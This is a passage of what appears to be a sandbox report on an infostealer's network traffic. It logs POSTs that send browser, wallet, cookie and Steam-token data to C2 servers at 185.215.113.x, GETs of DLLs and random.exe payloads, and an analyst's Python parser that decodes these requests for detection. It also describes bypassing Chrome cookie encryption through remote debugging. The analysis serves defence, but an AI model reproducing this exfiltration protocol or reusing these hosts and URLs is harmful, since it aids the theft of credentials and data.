Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"browsers------FIJKEHJJDAAKFHIDAKFH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"plugins------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"fplugins------GIJDAFBKFIECBGCAKECG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.206Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 2d 2d 0d 0a Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHJDAKEGDBFHCAAKJJJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file"------JJJECFIECBGDGCAAAEHI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file"------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 2d 2d 0d 0a Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="message"wallets------CFCFCAAAAFBAKEBFBAKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="message"files------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"ybncbhylepme------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
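The POSTs to /c4becf79229cb002.php above are the stealer's whole conversation with 185.215.113.206 in clear text, and the hex dumps show the CRLF framing that the "Data Ascii" rendering collapses. The first multipart POST registers the victim (hwid=ECB97320DD0F807656615, build=drum); every later POST carries the same 72-character token; message=browsers, plugins, fplugins, wallets, files mark the collection phases; and file_name/file pairs carry the loot, both base64. Decoded, the file names on this page are cookies\Google Chrome_.txt, smjllmymlbzq.pwd and steam_tokens.txt, and the content of the Chrome cookie file is {"id":1,"result":{"cookies":[]}}. That is not a copy of Chrome's Cookies database; it has the shape of a Chrome DevTools Protocol reply (the form Network.getAllCookies returns), which fits the report's "Attempt to bypass Chrome Application-Bound Encryption" signature: the browser is made to decrypt its own cookies over a remote-debugging session. The report shows the reply being uploaded, not how it was obtained, so treat that reading as an inference. The parser below is an added example, my code rather than Joe Sandbox's or the malware's, that decodes these bodies into protocol phases; the sample bodies are reassembled from the hex dumps above by the build_body() helper, which is my construction, and the Content-Length values in the request headers serve as the check that the reassembly is byte-exact.

```python
import base64
import json
import re


def parse_multipart(content_type, body):
    """Minimal multipart/form-data parser: {field name: raw bytes}. Only what this C2 uses."""
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(1).strip().encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, data = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = data[:-2] if data.endswith(b"\r\n") else data
    return fields


def classify(content_type, body):
    """Map one POST to the gate onto a protocol phase."""
    f = parse_multipart(content_type, body)
    if "hwid" in f:                          # first contact: victim id + build tag
        return {"kind": "register", "hwid": f["hwid"].decode(), "build": f["build"].decode()}
    if "message" in f:                       # phase marker: browsers, plugins, wallets, files, ...
        return {"kind": "phase", "token": f["token"].decode(), "message": f["message"].decode()}
    if "file_name" in f:                     # exfiltrated artefact, name and content base64
        name = base64.b64decode(f["file_name"]).decode("utf-8", "replace")
        content = base64.b64decode(f.get("file", b""))
        rec = {"kind": "upload", "file_name": name, "size": len(content)}
        try:   # {"id":N,"result":{"cookies":[...]}} is the shape of a DevTools Protocol reply
            rec["devtools_cookies"] = len(json.loads(content)["result"]["cookies"])
        except (ValueError, KeyError, TypeError):
            pass
        return rec
    return {"kind": "unknown", "fields": sorted(f)}


TOKEN = b"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88"
# Five of the POST bodies shown above: (20-letter boundary suffix, [(field, value), ...]).
SAMPLE_POSTS = [
    (b"BGDAAEHDHIIJKECBKEBA", [(b"hwid", b"ECB97320DD0F807656615"), (b"build", b"drum")]),
    (b"FIJKEHJJDAAKFHIDAKFH", [(b"token", TOKEN), (b"message", b"browsers")]),
    (b"DHJDAKEGDBFHCAAKJJJD", [(b"token", TOKEN),
                               (b"file_name", b"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ="),
                               (b"file", b"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=")]),
    (b"JJJECFIECBGDGCAAAEHI", [(b"token", TOKEN),
                               (b"file_name", b"c21qbGxteW1sYnpxLnB3ZA=="), (b"file", b"")]),
    (b"CFCFCAAAAFBAKEBFBAKK", [(b"token", TOKEN), (b"message", b"wallets")]),
]


def build_body(boundary, parts):
    """Reassemble a body exactly as the sample sends it (constructed from the hex dumps)."""
    delim = b"------" + boundary
    body = b""
    for name, value in parts:
        body += (delim + b'\r\nContent-Disposition: form-data; name="' + name
                 + b'"\r\n\r\n' + value + b"\r\n")
    return body + delim + b"--\r\n"


def triage_samples():
    return [classify("multipart/form-data; boundary=----" + b.decode(), build_body(b, parts))
            for b, parts in SAMPLE_POSTS]


if __name__ == "__main__":
    for rec in triage_samples():
        print(rec)
```

Pointing `classify()` at the bodies of a full pcap gives the phase list and the decoded file names directly; an upload whose decoded content parses as a DevTools reply is the on-the-wire tell for the remote-debugging cookie theft, independent of whether the headless browser launch was observed on the host.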
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
